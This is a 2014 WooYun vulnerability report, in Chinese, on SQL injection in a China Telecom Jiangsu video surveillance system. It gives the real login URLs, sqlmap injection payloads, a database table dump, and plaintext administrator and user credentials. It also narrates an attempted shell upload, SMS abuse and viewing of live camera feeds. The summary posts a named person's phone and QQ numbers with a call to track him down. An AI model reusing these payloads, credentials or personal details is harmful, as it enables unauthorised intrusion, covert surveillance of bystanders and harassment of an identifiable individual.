当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083160

漏洞标题:中国电信某省视频看护系统SQL注入(可看时时直播哦)

相关厂商:中国电信

漏洞作者: 小饼仔

提交时间:2014-11-13 18:23

修复时间:2014-12-28 18:24

公开时间:2014-12-28 18:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-13: 细节已通知厂商并且等待厂商处理中
2014-11-18: 厂商已经确认,细节仅向厂商公开
2014-11-28: 细节向核心白帽子及相关领域专家公开
2014-12-08: 细节向普通白帽子公开
2014-12-18: 细节向实习白帽子公开
2014-12-28: 细节向公众公开

简要描述:

本来想找一找有没有拍到妹子或者什么不该拍到的,结果看到了一个保安大叔在玩手机~
哎~
PS. 一个妹子朋友被骗了,求人肉骗子 骗子信息 电话号码:13918792971(上海) QQ: 94478959 姓名:王小新,自称在南京读过大学,此人租房不给退押金,人跑了,打电话不接,妹子很伤心,有消息的请私信联系,感谢各位大神帮忙,妹子爆照!

详细说明:

系统:中国电信“平安商铺”视频看护系统--中国电信江苏公司
管理员登入链接:http://pa.jsict.com/globeyes/admin/index.jsp

111.jpg


还有个用户登录的 http://pa.jsict.com/globeyes/user/index.jsp
这里以管理员登录界面为例,用户登录同理
管理员登陆处存在注入,验证码不会过期
登陆burp抓包,发现是get请求

"http://pa.jsict.com/globeyes/admin/login.jsp?LoginName=1111&Password=1111&user_pw2=7156&rand=7186&platform=nanjing&login=suzhou

漏洞证明:

参数LoginName存在注入
证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: LoginName
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: LoginName=1111' RLIKE (SELECT (CASE WHEN (1482=1482) THEN 1111 ELSE 0x28 END)) AND 'HdHJ'='HdHJ&Password=1111&user_pw2=7156&rand=7186&platform=nanjing&login=suzhou
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: LoginName=1111' AND SLEEP(5) AND 'wKGK'='wKGK&Password=1111&user_pw2=7156&rand=7186&platform=nanjing&login=suzhou
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current database: 'globeyes'
current user is DBA: False
available databases [4]:
[*] globeyes
[*] information_schema
[*] mysql
[*] test
Database: globeyes
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| terminal_log | 2387552 |
| hd_info | 2281330 |
| process_info | 2120898 |
| system_status | 845777 |
| user_fee | 841467 |
| storage | 366471 |
| terminal_online_time | 285318 |
| dispmsg_bak | 256170 |
| system_stat | 185727 |
| user_log | 88911 |
| sms_queue | 44308 |
| test_table | 39799 |
| saveinfo | 27904 |
| monitor_event | 8620 |
| terminal_param | 8426 |
| `user` | 8015 |
| terminal | 6444 |
| voice_queue | 5523 |
| child_terminal | 3605 |
| notify_service | 676 |
| admin | 258 |
| area | 129 |
| user_t | 87 |
| alarm_dispose | 60 |
| store_setup | 60 |
| police_service | 53 |
| ipc | 36 |
| terminal_t | 34 |
| notify_service_temp | 33 |
| partition_list | 29 |
| ttt | 24 |
| process_list | 23 |
| host_info | 22 |
| police_watcher | 21 |
| service_monitor | 20 |
| police | 19 |
| software_version | 18 |
| product | 16 |
| SaveSwitcher | 16 |
| client_session | 13 |
| alarm_setting | 7 |
| manufacturer | 7 |
| dispmsg | 5 |
| feeset | 1 |
+----------------------+---------+


数据量加起来近千万,不过很多是设备信息。
然后找了找,找到了管理员表:admin
试了前面好多个账号,不是区域管理员就是设备安装人员
最后决定选最后一个,结果有惊喜,貌似是超级管理员!
账号密码adminliunan 123456abc
然后我们登入系统,会跳转到 http://61.177.19.66:6886/globeyes/admin/mainForm.jsp

222.jpg


然后我们来看一下功能
管理员部分:修改、删除、创建管理员

333.jpg


用户管理:添加、删除、修改用户密码、快速开户

444.jpg


终端管理:

555.jpg


系统管理:里面很多ip,没仔细研究

666.jpg


其他功能不列了,足以证明该账户是超级管理员了~
然后找找能不能上传shell,找了下,有能上传文件的,上传了shell,结果代码没一行变成添加设备名称,害得我一个个手动删除了这些设备。拿shell失败
最后拿里面的接口测试功能给问题描述里面的骗子发了条短信,骗子真可恶!
管理员到此为止。
然后我们来找一个用户,看一下用户这边的系统功能
这里为了不影响用户使用,没有用超级管理员重置密码,是到数据库查的密码,MD5解密之后得到
用户名 hyzx 密码 123456
这密码,无语了
成功登入,是个地税局的,可以看各个监控的视频

777.jpg


保安大叔

888.jpg


用户信息

999.jpg


可以录像,截图,其他功能就不贴了
rank看着给吧~

修复方案:

系统里面有日志记录,不能删除,这里声明一下未做破坏,只是测试了一下,谢绝查水表!

版权声明:转载请注明来源 小饼仔@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-11-18 12:06

厂商回复:

最新状态:

暂无